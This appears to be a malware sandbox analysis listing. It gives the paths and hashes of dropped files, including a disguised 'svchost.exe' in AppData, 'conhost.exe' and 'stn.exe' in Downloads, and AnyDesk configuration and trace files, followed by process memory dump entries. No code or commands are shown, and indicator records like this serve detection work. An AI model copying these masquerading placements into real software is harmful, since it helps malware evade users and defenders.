C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
f41f42c322498af0591f396c59dd4304

SHA1
e1e5aa68d73d48bc5e743a34f6c0fa8960ff7514

SHA256
d8bd9a4a363ff2ac2dc887759ec6ba4215a4ce0925a8fb9c531573458ee4a31c

SHA512
2328a1b402b4fb0de9c451fb630eab58549129d3bcfb70b9834cfbd16065ebaadec006b309ea17ac182d34c53e01705cbc9e0196eb0cbd62600c866e79a1844f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
98baf5117c4fcec1692067d200c58ab3

SHA1
5b33a57b72141e7508b615e17fb621612cb8e390

SHA256
30bf8496e9a08f4fdfe4767abcd565f92b6da06ca1c7823a70cb7cab16262e51

SHA512
344a70bfc037d54176f12db91f05bf4295bb587a5062fd1febe6f52853571170bd8ef6042cb87b893185bbae1937cf77b679d7970f8cc1c2666b0b7c1b32987d

Download Submit
C:\Users\Admin\AppData\Local\Temp\3393.tmp\3394.tmp\3395.bat

Filesize
3KB

MD5
7012c3fd0feac28742d9a2a6d152088a

SHA1
0e466496b3a5d76f4b57cedec7941411173eaf6f

SHA256
cc0a2b202c7409e264d71bdff621fe96983153682fc86e1400b2e5dac5c9dfd3

SHA512
d0456b0bebfe46c62bf481c22c7f7853cb202f74d61cd31da1688d13f3c5563ebdf6ccc0caa70f031e6eb92603f1493e503a81675f14fb94574e174344997f74

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_z2vorpye.jpr.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\svchost.exe

Filesize
120KB

MD5
fcc9fb31cf181c59c8a3893355427406

SHA1
9c42e25a5931d4404026d3eb3c8c5b75241eb720

SHA256
473b3810a61db67a4099cd21908221937a197773b73d3ae930b032ca52abd140

SHA512
6c902b00acb8b8dc85dfa94887575fd18480bb7a4a11e63a9d1fc9ab97cb0945d1c0e0dcb5ba32c23ca144747c7b1f624506b7c389ba73017ddcc7def1509076

Download Submit
C:\Users\Admin\AppData\Roaming\AnyDesk\ad.trace

Filesize
34KB

MD5
85c45d1628f4671e0b127ea0d41ad514

SHA1
f3db708b833857e6e1c2e14678e3a1fed2cd1fcd

SHA256
f30f4b7ff43b58f11b91bd57a3956ecc3b020a35b68df7943d5a5e467986c62a

SHA512
e3db38577cb62507084cd6466a7487e8a9717898f7b018c893e112df179c3d6d84f3b8bfa908162cbdad684932ded56eb1dfd37afda2978ace3b9f755fb5bc20

Download Submit
C:\Users\Admin\AppData\Roaming\AnyDesk\ad.trace

Filesize
38KB

MD5
9364c1b33c3318d90dbd639e43ed0b90

SHA1
47f34d54f1edcfbde5b35add3e87c7452aeff194

SHA256
f04856638b54e9af1644d70508ce3c3ba6fdbee1420c634e2ed1ad6699de6da1

SHA512
69118f0880f11ec86803520129bac86e0f0925be06e8114a157586b1cbbb02c0c08a04d46908c10fba95fbabf443d30bed1097aaa415754bff9b8f4414a531d7

Download Submit
C:\Users\Admin\AppData\Roaming\AnyDesk\ad.trace

Filesize
4KB

MD5
0ce3b7e79bc424c5c8e20cb9905188dd

SHA1
19672e449199ac668c22a946195f963c1d9f85f4

SHA256
acae9e618daf74fcaa5f699fdcf275c89023be67520f2f1b75b05e2b13c69131

SHA512
e6344332a163a4f2f251f0bfda0f10bb56b279c9b780754420b7a195441a8e2b57c06ff4760d31cfcc6ee8ac00931556af65e96b56216bd6a014d983f538bd94

Download Submit
C:\Users\Admin\AppData\Roaming\AnyDesk\ad.trace

Filesize
8KB

MD5
23a5bc22360ff25278f1c5ded69fa4fe

SHA1
91478b279ba5235383bd2462442056e8b3d3c1d7

SHA256
b286b26682d045468bccfe95ec1627854cc3af9c499f25758957caa53b183ed1

SHA512
3bc02ca05255b67165e944153556a0009b7b51f384a85791d979334d600da8d60f780ef818aa1e72d28d7b7fbebffb66f1697e1ec0c842f65bbe69f454d1f093

Download Submit
C:\Users\Admin\AppData\Roaming\AnyDesk\ad.trace

Filesize
41KB

MD5
9ff61cba579577e02ec9640d49cc6c82

SHA1
d7a88cbaa3afb38a9814d37dcc50299f9aa84efb

SHA256
bb8f2e7ca1e098dc146a614ffd7c814e748c7b15e0e7e032834c021bc3ddec1b

SHA512
d120594a1b59ccc2d5c67724d497ad11b4605742a6d8feeac3e506b22b09e61a11b2e24edffc1ea225722b16212f4623be208a70be5fcf2748aae7db7a17f63c

Download Submit
C:\Users\Admin\AppData\Roaming\AnyDesk\service.conf

Filesize
2KB

MD5
371e8fbe348d978148087474167e8092

SHA1
76dfeaf346af76443ba74db34412250566095702

SHA256
2704ed053b7a8ad527403c177b6b467bfa7c3d794cb7e5cd30308076c537829c

SHA512
5b97602264fd5d11e5b5f5a8de6ce180031d02dd9ae24ea23cec0f0a29ecbcc5a0af99003b8546eb254b5065e7e35924a4b621904e79d8d597b639fe6ff7f593

Download Submit
C:\Users\Admin\AppData\Roaming\AnyDesk\system.conf

Filesize
612B

MD5
8a77ad71f04e75118e232d68945adf9c

SHA1
0018ae79adba2f513851a92d2a958c1e1d7ad623

SHA256
58908647760ac7d91c07f48f777deaabcbfbc7debd3c2516a05586a79c547602

SHA512
4152ad71a3f11ae30fa0f009c7c22502bf7540c6b6f5910289516b19cf1cffa38f00da836db09ea962c23e0ab53af25f4cbe4dab643f861973edde7add97dd59

Download Submit
C:\Users\Admin\AppData\Roaming\AnyDesk\system.conf

Filesize
733B

MD5
835967723972502424ed63a926ad90a0

SHA1
4971133a8e9a5c55280e8baa5c1056399dcb35b2

SHA256
57b156f19ddbf0f4e82321a9ef70f95cd4329a483ef0345561eecbd6380dde18

SHA512
4075b608eef6ed3cf8c82318689a4851c9e002e8597473a0eeb8625035d5977e92d59c1e161a4c29fe53eb891c2a2ff2e7151edbbf78ed2c1f921daaf20792f7

Download Submit
C:\Users\Admin\AppData\Roaming\AnyDesk\system.conf

Filesize
312B

MD5
0c04ad1083dc5c7c45e3ee2cd344ae38

SHA1
f1cf190f8ca93000e56d49732e9e827e2554c46f

SHA256
6452273c017db7cbe0ffc5b109bbf3f8d3282fb91bfa3c5eabc4fb8f1fc98cb0

SHA512
6c414b39bbc1f1f08446c6c6da6f6e1ceb9303bbf183ae279c872d91641ea8d67ec5e5c4e0824da3837eca73ec29fe70e92b72c09458c8ce50fa6f08791d1492

Download Submit
C:\Users\Admin\AppData\Roaming\AnyDesk\system.conf

Filesize
424B

MD5
e3ef55428a4a4e33433e3b4ab9870390

SHA1
f20ec31a41f9e768b079997fc2d3cda27fd588c3

SHA256
783fcaecfd534872ac95c9a35be0e33c7c067fec219933f314e6d002ee2fd4ae

SHA512
f1326065c58a710576e9fbbaada5ad23bae940d6eba1ec04b95b1c8778612558bf30a82dfe0458f52f1abffd19f887b47a920eb31f8f161ed3a3010fe1724e47

Download Submit
C:\Users\Admin\AppData\Roaming\AnyDesk\system.conf

Filesize
424B

MD5
8375659e0ced709497c50e72d2c25533

SHA1
1b0fefa309ebc9b017a55db40fabfcced8122102

SHA256
5e8fdb5c9ed5a15d82d85e13a27d704e5960310f1cdb23870eaa647432951dc8

SHA512
8889de7e094eddb1b643333dd882699076023edfd04b93604528329e786d0059aa034237b6db29993b35a67d70ed8cf4d9743d1fe28b0f38aa72db489273f6b5

Download Submit
C:\Users\Admin\AppData\Roaming\AnyDesk\user.conf

Filesize
5KB

MD5
2d82806800888b9405c139210f462c08

SHA1
b3cfc07cff12eb0d3b04d8d1d1a50a3e0140226e

SHA256
e8e8fb15c2b15a07b05ed97b20eaa064e4858e9419921d9431da637f0c5bdb76

SHA512
d0ab05e4df4ad4172b11e977a9dc59657caaf34804eb33581e86681f1b12138773dfda04b7ca3baad75ef0927c2b56576695f5eba6e6ef18866f11741a63c1c1

Download Submit
C:\Users\Admin\AppData\Roaming\AnyDesk\user.conf

Filesize
5KB

MD5
5b19758c204a920900dcb258f8d03973

SHA1
b0eb05023d3e75526dd9d3a7c7bf84364c56ca46

SHA256
86a94b25e0e2a6a7e63857a4a08fbf416668a89721e722e3720befe8dc58bca2

SHA512
939d93c36fc8b6d87e892951904bf6556f4544762ac4e63a971964644bb9f009c995b36c620565c0edcd4ee80633d80ede69255c37fd08c8506ef53fa85d33f2

Download Submit
C:\Users\Admin\AppData\Roaming\AnyDesk\user.conf

Filesize
41B

MD5
a787c308bd30d6d844e711d7579be552

SHA1
473520be4ea56333d11a7a3ff339ddcadfe77791

SHA256
8a395011a6a877d3bdd53cc8688ef146160dab9d42140eb4a70716ad4293a440

SHA512
da4fcf3a3653ed02ee776cfa786f0e75b264131240a6a3e538c412e98c9af52c8f1e1179d68ed0dd44b13b261dc941319d182a16a4e4b03c087585b9a8286973

Download Submit
C:\Users\Admin\AppData\Roaming\AnyDesk\user.conf

Filesize
1KB

MD5
79b90a6e606a0c6d29d525ef8ae7ca94

SHA1
01d6d133ce03b7916435049d45c437f0a8499c91

SHA256
3e17d8f75f161af0b9b792511fd27fc88afcde1e8ff7b82c7d88890e57639d00

SHA512
70b79a48e7e68ffc68fa7b642d73be576d9a4a432418296a099183d1bcdb9e789e42280150855b483afb4fbf53d6aee1d7599d6ea337cfdbf23a676795e6a615

Download Submit
C:\Users\Admin\Downloads\AnyDesk.exe

Filesize
5.0MB

MD5
a21768190f3b9feae33aaef660cb7a83

SHA1
24780657328783ef50ae0964b23288e68841a421

SHA256
55e4ce3fe726043070ecd7de5a74b2459ea8bed19ef2a36ce7884b2ab0863047

SHA512
ca6da822072cb0d3797221e578780b19c8953e4207729a002a64a00ced134059c0ed21b02572c43924e4ba3930c0e88cd2cdb309259e3d0dcfb0c282f1832d62

Download Submit
C:\users\Admin\downloads\conhost.exe

Filesize
120KB

MD5
de617b28ec0a15308b9160f4f54b5e45

SHA1
109b9d31c04d8623a00ce5bcdf57ce11d0cc903b

SHA256
a07cd9ab4effcf88d86143b16fc042b567b845d3d4242e336033be9905db9da4

SHA512
5f2abd3afd1289b231f0c9af94e2ce9152498dc19c1fad160159b24ae4f5d6e47fce89ff50de234ec998a7853c3322cc34bc0dcf0d3ea498e5f04ca9e79ddd38

Download Submit
C:\users\Admin\downloads\stn.exe

Filesize
120KB

MD5
7b93e9c9d7a69a4fb1a4f47996066f34

SHA1
e0865c3dfab78d6e1bc9b6614d49742fc35f2caf

SHA256
7ee61d546973dae00f1567a5faf30fa39d70339b64dd913a5925aee87067c4d8

SHA512
453eca32ba8596c83f231cdfa88df5145d010c91ad9e9e55e77efe77ec1b4541c11c4a38b3562d83e2dd3efd9c45deda169878f1d4538a3258c8baa19275b8e4

Download Submit
memory/632-23-0x0000000000530000-0x0000000001C67000-memory.dmp

Filesize
23.2MB

Download
memory/632-31-0x0000000002180000-0x0000000002181000-memory.dmp

Filesize
4KB

Download
memory/632-22-0x0000000000530000-0x0000000001C67000-memory.dmp

Filesize
23.2MB

Download
memory/632-123-0x0000000000530000-0x0000000001C67000-memory.dmp

Filesize
23.2MB

Download
memory/832-355-0x00007FF99CA30000-0x00007FF99D4F1000-memory.dmp

Filesize
10.8MB

Download
memory/832-435-0x00007FF99CA30000-0x00007FF99D4F1000-memory.dmp

Filesize
10.8MB

Download
memory/1004-341-0x00000138B9280000-0x00000138B9290000-memory.dmp

Filesize
64KB

Download
memory/1004-429-0x00007FF99CB80000-0x00007FF99D641000-memory.dmp

Filesize
10.8MB

Download
memory/1004-426-0x0000021070370000-0x0000021070380000-memory.dmp

Filesize
64KB

Download
memory/1004-339-0x00007FF99CA30000-0x00007FF99D4F1000-memory.dmp

Filesize
10.8MB

Download
memory/1004-416-0x00007FF99CB80000-0x00007FF99D641000-memory.dmp

Filesize
10.8MB

Download
memory/1004-340-0x00000138B9280000-0x00000138B9290000-memory.dmp

Filesize
64KB

Download
memory/1004-344-0x00007FF99CA30000-0x00007FF99D4F1000-memory.dmp

Filesize
10.8MB

Download
memory/1916-438-0x0000000000880000-0x0000000001FB7000-memory.dmp

Filesize
23.2MB

Download
memory/1916-433-0x0000000000880000-0x0000000001FB7000-memory.dmp

Filesize
23.2MB

Download
memory/2028-309-0x00000233344D0000-0x00000233344E0000-memory.dmp

Filesize
64KB

Download
memory/2028-310-0x00000233344D0000-0x00000233344E0000-memory.dmp

Filesize
64KB

Download
memory/2028-297-0x00007FF99C910000-0x00007FF99D3D1000-memory.dmp

Filesize
10.8MB

Download
memory/2028-314-0x00007FF99C910000-0x00007FF99D3D1000-memory.dmp

Filesize
10.8MB

Download
memory/2352-442-0x0000000000880000-0x0000000001FB7000-memory.dmp

Filesize
23.2MB

Download
memory/2352-430-0x0000000000880000-0x0000000001FB7000-memory.dmp

Filesize
23.2MB

Download
memory/2352-131-0x0000000000880000-0x0000000001FB7000-memory.dmp

Filesize
23.2MB

Download
memory/2352-130-0x0000000000880000-0x0000000001FB7000-memory.dmp

Filesize
23.2MB

Download
memory/2352-308-0x0000000000880000-0x0000000001FB7000-memory.dmp

Filesize
23.2MB

Download
memory/2540-388-0x0000023ED2AE0000-0x0000023ED2AF0000-memory.dmp

Filesize
64KB

Download
memory/2540-389-0x0000023ED2AE0000-0x0000023ED2AF0000-memory.dmp

Filesize
64KB

Download
memory/2540-387-0x00007FF99CA30000-0x00007FF99D4F1000-memory.dmp

Filesize
10.8MB

Download
memory/2540-401-0x00007FF99CA30000-0x00007FF99D4F1000-memory.dmp

Filesize
10.8MB

Download
memory/3356-326-0x00007FF99C910000-0x00007FF99D3D1000-memory.dmp

Filesize
10.8MB

Download
memory/3356-327-0x000001875ECE0000-0x000001875ECF0000-memory.dmp

Filesize
64KB

Download
memory/3356-329-0x00007FF99C910000-0x00007FF99D3D1000-memory.dmp

Filesize
10.8MB

Download
memory/3356-213-0x0000000000880000-0x0000000001FB7000-memory.dmp

Filesize
23.2MB

Download
memory/3356-209-0x00000000028F0000-0x00000000028F1000-memory.dmp

Filesize
4KB

Download
memory/3356-182-0x0000000000880000-0x0000000001FB7000-memory.dmp

Filesize
23.2MB

Download
memory/3452-412-0x000001B9F4000000-0x000001B9F4010000-memory.dmp

Filesize
64KB

Download
memory/3452-415-0x00007FF99CB80000-0x00007FF99D641000-memory.dmp

Filesize
10.8MB

Download
memory/3452-411-0x00007FF99CB80000-0x00007FF99D641000-memory.dmp

Filesize
10.8MB

Download
memory/3940-253-0x0000000002860000-0x0000000002861000-memory.dmp

Filesize
4KB

Download
memory/3940-248-0x0000000000880000-0x0000000001FB7000-memory.dmp

Filesize
23.2MB

Download
memory/3940-259-0x0000000000880000-0x0000000001FB7000-memory.dmp

Filesize
23.2MB

Download
memory/3940-247-0x0000000000880000-0x0000000001FB7000-memory.dmp

Filesize
23.2MB

Download
memory/3976-384-0x00000161ED2C0000-0x00000161ED2D0000-memory.dmp

Filesize
64KB

Download
memory/3976-383-0x00000161ED2C0000-0x00000161ED2D0000-memory.dmp

Filesize
64KB

Download
memory/3976-382-0x00007FF99CA30000-0x00007FF99D4F1000-memory.dmp

Filesize
10.8MB

Download
memory/3976-386-0x00007FF99CA30000-0x00007FF99D4F1000-memory.dmp

Filesize
10.8MB

Download
memory/4180-260-0x000001C339140000-0x000001C339162000-memory.dmp

Filesize
136KB

Download
memory/4180-271-0x000001C3391C0000-0x000001C3391D0000-memory.dmp

Filesize
64KB

Download
memory/4180-270-0x00007FF99C910000-0x00007FF99D3D1000-memory.dmp

Filesize
10.8MB

Download
memory/4180-277-0x00007FF99C910000-0x00007FF99D3D1000-memory.dmp

Filesize
10.8MB

Download
memory/4180-272-0x000001C3391C0000-0x000001C3391D0000-memory.dmp

Filesize
64KB

Download
memory/4500-290-0x0000024A6B550000-0x0000024A6B560000-memory.dmp

Filesize
64KB

Download
memory/4500-289-0x0000024A6B550000-0x0000024A6B560000-memory.dmp

Filesize
64KB

Download
memory/4500-295-0x00007FF99C910000-0x00007FF99D3D1000-memory.dmp

Filesize
10.8MB

Download
memory/4500-288-0x00007FF99C910000-0x00007FF99D3D1000-memory.dmp

Filesize
10.8MB

Download
memory/4960-367-0x00007FF99CA30000-0x00007FF99D4F1000-memory.dmp

Filesize
10.8MB

Download
memory/4960-369-0x000001D8FEE10000-0x000001D8FEE20000-memory.dmp

Filesize
64KB

Download
memory/4960-368-0x000001D8FEE10000-0x000001D8FEE20000-memory.dmp

Filesize
64KB

Download
memory/4960-371-0x00007FF99CA30000-0x00007FF99D4F1000-memory.dmp

Filesize
10.8MB

Download
memory/4992-124-0x0000000000530000-0x0000000001C67000-memory.dmp

Filesize
23.2MB

Download
memory/4992-21-0x0000000000530000-0x0000000001C67000-memory.dmp

Filesize
23.2MB

Download
memory/4992-29-0x0000000002410000-0x0000000002411000-memory.dmp

Filesize
4KB

Download
memory/5028-315-0x0000000000880000-0x0000000001FB7000-memory.dmp

Filesize
23.2MB

Download
memory/5028-173-0x0000000000880000-0x0000000001FB7000-memory.dmp

Filesize
23.2MB

Download
memory/5028-174-0x0000000000880000-0x0000000001FB7000-memory.dmp

Filesize
23.2MB

Download
memory/5028-206-0x0000000002730000-0x0000000002731000-memory.dmp

Filesize
4KB

Download
memory/5060-171-0x0000000000530000-0x0000000001C67000-memory.dmp

Filesize
23.2MB

Download
memory/5060-16-0x0000000003CC0000-0x0000000003CC1000-memory.dmp

Filesize
4KB

Download
memory/5060-12-0x0000000000530000-0x0000000001C67000-memory.dmp

Filesize
23.2MB

Download
memory/5060-13-0x0000000000530000-0x0000000001C67000-memory.dmp

Filesize
23.2MB

Download